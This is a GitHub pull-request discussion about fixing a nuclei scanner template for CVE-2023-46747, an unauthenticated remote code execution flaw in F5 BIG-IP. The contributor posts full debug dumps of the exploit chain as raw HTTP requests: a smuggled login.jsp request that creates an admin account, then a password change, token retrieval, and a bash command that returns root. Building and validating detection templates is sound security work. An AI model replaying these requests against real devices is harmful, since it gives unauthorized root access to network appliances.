-
Notifications
You must be signed in to change notification settings - Fork 2.6k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Fix CVE-2023-46747.yaml #8500
Fix CVE-2023-46747.yaml #8500
Conversation
Hello @0xorOne, I've updated the template with the Please check and let us know if the updated template works for you. Hopefully, this will solve the issue you are facing. |
Thanks for your reply. I found that when sending the /mgmt/tm/auth/user/{} packet through nuclei, the returned content will be 401. |
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/9HIHP
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 17:56:43 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html> |
Why do you need to request /mgmt/tm/auth/user/{} to change the password? |
nuclei -duc -ni -t CVE-2023-46747.yaml -u https://192.168.166.189 -vv -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.2
projectdiscovery.io
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.8 (latest)
[INF] New templates added in latest release: 79
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-46747] F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (@iamnoooob,@rootxharsh,@pdresearch) [critical]
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/tmui/login.jsp
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.166.189
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded
204
HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0
localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=1U5QN&name_before=&passwd=qUXSXxhSu3et&passwd_before=&finished=x&finished_before=
0
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/tmui/login.jsp
HTTP/1.1 200 OK
Content-Length: 7019
Cache-Control: no-cache, must-revalidate, no-store
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=utf-8
Date: Tue, 31 Oct 2023 18:15:37 GMT
F5-Login-Page: true
Pragma: no-cache, no-cache
Server: Apache
Set-Cookie: JSESSIONID=78pyut1qvoLQxqE5haROGRutLUtqehoz; Path=/tmui; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BIG-IP® - demo-f55.com (192.168.166.189)</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="expires" content="-1" />
<meta name="copyright" content="(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved." />
<meta name="description" content="BIG-IP® Configuration Utility" />
<meta name="author" content="F5 Networks, Inc." />
<meta name="robots" content="noindex,nofollow" />
<link rel="Shortcut Icon" type="image/x-icon" href="/xui/common/images/favicon.ico" />
<link rel="stylesheet" type="text/css" href="tmui/login/css/login.css?" />
<script type="text/javascript" src="/xui/common/scripts/utility.js?"></script>
<script type="text/javascript" charset="utf-8">
// Break out of the XUI wrapper or frameset
if (window.location != window.top.location) {
window.top.location = window.location;
}
window.onload = function(e) {
// Display error modal if necessary (but don't show it if they've failed authentication
// because they just saw the message on the original page load).
// Delete some state-preserving cookies if the user has logged out (doesn't have a BIGIPAuthCookie)
// Also delete these state cookies if we're rebooting.
var authCookieExists = false;
//Delete partition & folder cookies, no matter what the situation, to handle cases
// where the user's folder/partition permissions may have been changed. bug 415304
delCookie("F5_CURRENT_FOLDER");
delCookie("F5_CURRENT_PARTITION");
if ( !authCookieExists || window.location.pathname.indexOf('reboot') != -1) {
deleteStatefulCookies();
}
// Reboot
if (window.location.pathname.indexOf('reboot') != -1) {
frames['contentframe'].location.replace(path_rebootModal);
document.getElementById('legallink').style.display = 'none';
}
// Welcome
else {
frames['contentframe'].location.replace('/tmui/tmui/login/welcome.jsp');
var loginFormObj = document.getElementById('loginform');
loginFormObj.style.display = 'block';
var msgText;
switch (getUrlValue('msgcode')) {
case "1":
msgText = 'Login failed';
break;
case "2":
msgText = 'Your credentials are no longer valid. Please log in again.';
break;
case "3":
msgText = 'You have been logged out. Please log in again.';
break;
case "4":
msgText = 'Remote authentication server unreachable; local authentication failed.';
break;
case "5":
msgText = 'Password changed successfully.';
break;
}
if (msgText) {
var msgObj = document.getElementById('message');
msgObj.style.display = 'block';
msgObj.innerHTML = msgText;
}
// Focus on username field
var usernameObj = document.getElementById('username');
usernameObj.focus();
if (usernameObj.select) {
usernameObj.select();
}
}
};
function deleteStatefulCookies() {
delCookie("F5_CURRENT_FOLDER");
delCookie("F5_CURRENT_PARTITION");
delCookie("f5_refreshpage");
delCookie("f5currenttab");
delCookie("f5formpage");
delCookie("f5mainmenuopenlist");
}
function checkFormBeforeSubmit() {
// delete any stateful cookies if the username being submitted is different than the previously logged-in user.
var enteredUsername = document.getElementById('username').value;
var previousUsername = "";
if (enteredUsername != previousUsername) {
deleteStatefulCookies();
}
return true;
}
</script>
</head>
<body>
<div id="wrapper">
<div id="window">
<div id="banner">
<div id="logo">
<!--[if gt IE 6]><!-->
<img src="tmui/login/images/logo_f5.png" alt="F5 Networks Logo">
<!--<![endif]-->
<!--[if IE 6]>
<img src="tmui/login/images/transparent.gif" style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='tmui/login/images/logo_f5.png',sizingMethod='auto');" alt="F5 Networks Logo">
<![endif]-->
</div>
<h1>
BIG-IP
Configuration Utility</h1>
<h2>F5 Networks, Inc.</h2>
</div>
<div id="sidebar">
<div id="deviceinfo">
<label>Hostname</label>
<p title="demo-f55.com">demo-f55.com</p>
<label>IP Address</label>
<p title="192.168.166.189">192.168.166.189</p>
</div>
<p id="message" class="badtext"></p>
<form id="loginform" name="loginform" action="logmein.html?" method="POST" onsubmit="return checkFormBeforeSubmit();" style="display: none;">
<label>Username</label>
<input type="text" class="login" name="username" id="username" tabindex="1" autocomplete="off" />
<label>Password</label>
<input type="password" class="login" name="passwd" id="passwd" tabindex="2" autocomplete="off" />
<button type="submit" tabindex="3">Log in</button>
</form>
</div>
<iframe src="/xui/common/blank.html" id="contentframe" name="contentframe" frameborder="no" scrolling="auto"></iframe>
</div>
<div id="copyright">(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved.<br />
<a id="legallink"
href="tmui/login/legal.html"
target="contentframe" class="smalltext">F5 Networks, Inc. Legal Notices</a>
</div>
</div>
<div id="modal" style="display: none;">
<div class="overlay"></div>
<div class="content">
<p class="badtext">This BIG-IP system has encountered a configuration problem that may prevent the Configuration utility from functioning properly.</p>
<p>To prevent adverse effects on the system, F5 Networks recommends that you restrict your use of the Configuration utility to critical tasks only until the problem is resolved. Beware that attempting to modify your configuration in this state with the Configuration utility may cause your configuration to be overwritten.</p>
<button onclick="document.getElementById('modal').style.display='none';">Continue</button>
</div>
</div>
</body>
</html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/1U5QN
PATCH /mgmt/tm/auth/user/1U5QN HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic MVU1UU46cVVYU1h4aFN1M2V0
Content-Type: application/json
Accept-Encoding: gzip
{"password": "MjDWOJ3sHEYm79"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/1U5QN
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 18:15:37 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"1U5QN", "password":"MjDWOJ3sHEYm79"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 129
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:15:40 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"Authentication failed.","referer":"192.168.166.168","restOperationId":7158601,"kind":":resterrorresponse"}
[WRN] [CVE-2023-46747] Could not make http request for https://192.168.166.189: unresolved variables found: token
[INF] No results found. Better luck next time! |
I fixed the problem and made some more modifications, it should now work. |
The vulnerability can be detected by changing pass to password2. POST /mgmt/shared/authn/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{hex_decode(username)}}", "password":"{{password2}}"} nuclei -duc -ni -t CVE-2023-46747.yaml -u https://192.168.166.189 -vv -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.2
projectdiscovery.io
[INF] Current nuclei version: v3.0.2 (outdated)
[INF] Current nuclei-templates version: v9.6.8 (latest)
[INF] New templates added in latest release: 79
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-46747] F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (@iamnoooob,@rootxharsh,@pdresearch) [critical]
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/tmui/login.jsp
POST /tmui/login.jsp HTTP/1.1
Host: 192.168.166.189
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded
204
HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP
Tmui-Dubbuf
BBBBBBBBBBB
REMOTEROLE0
localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=mU7ML&name_before=&passwd=YyOGqpN7Zyxs&passwd_before=&finished=x&finished_before=
0
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/tmui/login.jsp
HTTP/1.1 200 OK
Content-Length: 7019
Cache-Control: no-cache, must-revalidate, no-store
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: text/html;charset=utf-8
Date: Tue, 31 Oct 2023 18:31:00 GMT
F5-Login-Page: true
Pragma: no-cache, no-cache
Server: Apache
Set-Cookie: JSESSIONID=A5bkD6xm5AXk0r3Cha8Bqx2pWlla5A3C; Path=/tmui; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BIG-IP® - demo-f55.com (192.168.166.189)</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="expires" content="-1" />
<meta name="copyright" content="(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved." />
<meta name="description" content="BIG-IP® Configuration Utility" />
<meta name="author" content="F5 Networks, Inc." />
<meta name="robots" content="noindex,nofollow" />
<link rel="Shortcut Icon" type="image/x-icon" href="/xui/common/images/favicon.ico" />
<link rel="stylesheet" type="text/css" href="tmui/login/css/login.css?" />
<script type="text/javascript" src="/xui/common/scripts/utility.js?"></script>
<script type="text/javascript" charset="utf-8">
// Break out of the XUI wrapper or frameset
if (window.location != window.top.location) {
window.top.location = window.location;
}
window.onload = function(e) {
// Display error modal if necessary (but don't show it if they've failed authentication
// because they just saw the message on the original page load).
// Delete some state-preserving cookies if the user has logged out (doesn't have a BIGIPAuthCookie)
// Also delete these state cookies if we're rebooting.
var authCookieExists = false;
//Delete partition & folder cookies, no matter what the situation, to handle cases
// where the user's folder/partition permissions may have been changed. bug 415304
delCookie("F5_CURRENT_FOLDER");
delCookie("F5_CURRENT_PARTITION");
if ( !authCookieExists || window.location.pathname.indexOf('reboot') != -1) {
deleteStatefulCookies();
}
// Reboot
if (window.location.pathname.indexOf('reboot') != -1) {
frames['contentframe'].location.replace(path_rebootModal);
document.getElementById('legallink').style.display = 'none';
}
// Welcome
else {
frames['contentframe'].location.replace('/tmui/tmui/login/welcome.jsp');
var loginFormObj = document.getElementById('loginform');
loginFormObj.style.display = 'block';
var msgText;
switch (getUrlValue('msgcode')) {
case "1":
msgText = 'Login failed';
break;
case "2":
msgText = 'Your credentials are no longer valid. Please log in again.';
break;
case "3":
msgText = 'You have been logged out. Please log in again.';
break;
case "4":
msgText = 'Remote authentication server unreachable; local authentication failed.';
break;
case "5":
msgText = 'Password changed successfully.';
break;
}
if (msgText) {
var msgObj = document.getElementById('message');
msgObj.style.display = 'block';
msgObj.innerHTML = msgText;
}
// Focus on username field
var usernameObj = document.getElementById('username');
usernameObj.focus();
if (usernameObj.select) {
usernameObj.select();
}
}
};
function deleteStatefulCookies() {
delCookie("F5_CURRENT_FOLDER");
delCookie("F5_CURRENT_PARTITION");
delCookie("f5_refreshpage");
delCookie("f5currenttab");
delCookie("f5formpage");
delCookie("f5mainmenuopenlist");
}
function checkFormBeforeSubmit() {
// delete any stateful cookies if the username being submitted is different than the previously logged-in user.
var enteredUsername = document.getElementById('username').value;
var previousUsername = "";
if (enteredUsername != previousUsername) {
deleteStatefulCookies();
}
return true;
}
</script>
</head>
<body>
<div id="wrapper">
<div id="window">
<div id="banner">
<div id="logo">
<!--[if gt IE 6]><!-->
<img src="tmui/login/images/logo_f5.png" alt="F5 Networks Logo">
<!--<![endif]-->
<!--[if IE 6]>
<img src="tmui/login/images/transparent.gif" style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='tmui/login/images/logo_f5.png',sizingMethod='auto');" alt="F5 Networks Logo">
<![endif]-->
</div>
<h1>
BIG-IP
Configuration Utility</h1>
<h2>F5 Networks, Inc.</h2>
</div>
<div id="sidebar">
<div id="deviceinfo">
<label>Hostname</label>
<p title="demo-f55.com">demo-f55.com</p>
<label>IP Address</label>
<p title="192.168.166.189">192.168.166.189</p>
</div>
<p id="message" class="badtext"></p>
<form id="loginform" name="loginform" action="logmein.html?" method="POST" onsubmit="return checkFormBeforeSubmit();" style="display: none;">
<label>Username</label>
<input type="text" class="login" name="username" id="username" tabindex="1" autocomplete="off" />
<label>Password</label>
<input type="password" class="login" name="passwd" id="passwd" tabindex="2" autocomplete="off" />
<button type="submit" tabindex="3">Log in</button>
</form>
</div>
<iframe src="/xui/common/blank.html" id="contentframe" name="contentframe" frameborder="no" scrolling="auto"></iframe>
</div>
<div id="copyright">(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved.<br />
<a id="legallink"
href="tmui/login/legal.html"
target="contentframe" class="smalltext">F5 Networks, Inc. Legal Notices</a>
</div>
</div>
<div id="modal" style="display: none;">
<div class="overlay"></div>
<div class="content">
<p class="badtext">This BIG-IP system has encountered a configuration problem that may prevent the Configuration utility from functioning properly.</p>
<p>To prevent adverse effects on the system, F5 Networks recommends that you restrict your use of the Configuration utility to critical tasks only until the problem is resolved. Beware that attempting to modify your configuration in this state with the Configuration utility may cause your configuration to be overwritten.</p>
<button onclick="document.getElementById('modal').style.display='none';">Continue</button>
</div>
</div>
</body>
</html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/mU7ML
PATCH /mgmt/tm/auth/user/mU7ML HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic bVU3TUw6WXlPR3FwTjdaeXhz
Content-Type: application/json
Accept-Encoding: gzip
{"password": "UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/mU7ML
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 31 Oct 2023 18:31:00 GMT
Server: Apache
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: Basic realm="Enterprise Manager"
X-Frame-Options: SAMEORIGIN
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"mU7ML", "password":"UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 129
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:02 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"Authentication failed.","referer":"192.168.166.168","restOperationId":7173213,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/util/bash
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: {{token}}
Accept-Encoding: gzip
{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/util/bash
HTTP/1.1 401 F5 Authorization Required
Connection: close
Content-Length: 138
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
Www-Authenticate: X-Auth-Token
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"code":401,"message":"X-F5-Auth-Token does not exist.","referer":"192.168.166.168","restOperationId":7173267,"kind":":resterrorresponse"}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/mU7ML
PATCH /mgmt/tm/auth/user/mU7ML HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 32
Authorization: Basic bVU3TUw6WXlPR3FwTjdaeXhz
Content-Type: application/json
Accept-Encoding: gzip
{"password": "UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/mU7ML
HTTP/1.1 200 OK
Connection: close
Content-Length: 470
Allow:
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Set-Cookie: BIGIPAuthCookie=alt65Iq5DAZmNaSRGBKZgf4Bxu69NSwzKVTUgnSR; path=/; Secure; HttpOnly; SameSite=Strict
Set-Cookie: BIGIPAuthUsernameCookie=mU7ML; path=/; Secure; HttpOnly; SameSite=Strict
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"kind":"tm:auth:user:userstate","name":"mU7ML","fullPath":"mU7ML","generation":592,"selfLink":"https://localhost/mgmt/tm/auth/user/mU7ML?ver=16.1.2.1","description":"mU7ML","encryptedPassword":"$6$eU8w/fCj$nJOsAUVfz14gPObNWXYt3/Ob7uyDVvC2qzVgxccdz8O6Z4E99ndn.fjFV.43nhDBfFyy1B/mKt3DS0zVrRphj0","sessionLimit":-1,"partitionAccess":[{"name":"all-partitions","role":"admin","nameReference":{"link":"https://localhost/mgmt/tm/auth/partition/all-partitions?ver=16.1.2.1"}}]}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login
POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/json
Accept-Encoding: gzip
{"username":"mU7ML", "password":"UIDd4ZMa0TpgvM"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login
HTTP/1.1 200 OK
Connection: close
Content-Length: 713
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:05 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"username":"mU7ML","loginReference":{"link":"https://localhost/mgmt/cm/system/authn/providers/local/login"},"loginProviderName":"local","token":{"token":"YTVLM4QBUL7XC5GU7V4WZPOVBA","name":"YTVLM4QBUL7XC5GU7V4WZPOVBA","userName":"mU7ML","authProviderName":"local","user":{"link":"https://localhost/mgmt/shared/authz/users/mU7ML"},"groupReferences":[],"timeout":1200,"startTime":"2023-10-31T11:31:06.060-0700","address":"192.168.166.168","partition":"[All]","generation":1,"lastUpdateMicros":1698777066060230,"expirationMicros":1698778266060000,"kind":"shared:authz:tokens:authtokenitemstate","selfLink":"https://localhost/mgmt/shared/authz/tokens/YTVLM4QBUL7XC5GU7V4WZPOVBA"},"generation":0,"lastUpdateMicros":0}
[INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/util/bash
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.166.189
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Length: 41
Content-Type: application/json
X-F5-Auth-Token: YTVLM4QBUL7XC5GU7V4WZPOVBA
Accept-Encoding: gzip
{"command":"run","utilCmdArgs":"-c id"}
[DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/util/bash
HTTP/1.1 200 OK
Connection: close
Content-Length: 167
Allow:
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: must-revalidate
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1
Content-Type: application/json; charset=UTF-8
Date: Tue, 31 Oct 2023 18:31:06 GMT
Expires: -1
Pragma: no-cache
Server: Jetty(9.2.22.v20170606)
Strict-Transport-Security: max-age=16070400; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
{"kind":"tm:util:bash:runstate","command":"run","utilCmdArgs":"-c id","commandResult":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}
[CVE-2023-46747:word-1] [http] [critical] https://192.168.166.189/mgmt/tm/util/bash [uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n,Username:mU7ML,Password:YyOGqpN7Zyxs,Token:YTVLM4QBUL7XC5GU7V4WZPOVBA] [pass="YyOGqpN7Zyxs"] |
Hi @0xorOne, It was just in the original template in this manner, but it did not work in your situation because the 2nd request for password change did not work for you. As I can see in the shared debug data, the updated template is working fine for you, we can now merge the changes. |
Thank you for your response. |
Hello @0xorOne, We appreciate your efforts in updating the template and making it more suitable, Your contribution has been truly valuable to us. Cheers! 🍻 You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again |
Template / PR Information
Template Validation
I've validated this template locally?
Additional Details (leave it blank if not applicable)
Additional References: